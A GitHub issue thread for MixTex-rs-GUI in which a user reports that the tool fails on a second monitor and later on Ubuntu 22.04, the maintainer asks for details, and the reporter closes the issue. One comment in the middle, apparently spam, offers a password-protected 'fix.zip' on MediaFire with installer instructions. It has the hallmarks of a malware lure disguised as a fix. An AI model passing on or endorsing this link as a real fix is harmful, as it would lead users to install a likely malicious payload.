### ISSUE TITLE
[FR] Support for dual monitors

### ISSUE THREAD

**Issue by e-zz** [MosRat/MixTex-rs-GUI#4]
Thanks for the GUI! 
Now it doesn't work on the second monitor. Would you plan to fix that?

> OS: Linux x64 6.5.0-21-generic

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MosRat** [comment]
> Thanks for the GUI! Now it doesn't work on the second monitor. Would you plan to fix that?
> 
> > OS: Linux x64 6.5.0-21-generic

What exactly is the problem? Screenshot don't work, or  it only work on one of the screens?

**Comment by e-zz** [comment]
> > Thanks for the GUI! Now it doesn't work on the second monitor. Would you plan to fix that?
> > > OS: Linux x64 6.5.0-21-generic
> 
> What exactly is the problem? Screenshot don't work, or it only work on one of the screens?

Sorry, actually the problem is more severe. On Ubuntu22.04, the GUI seems not working. The whole window blacked out when I activate the screenshot by shortcut. But I have decided to use the web GUI instead. So I will close this issue. 
Thanks again for sharing the repo!
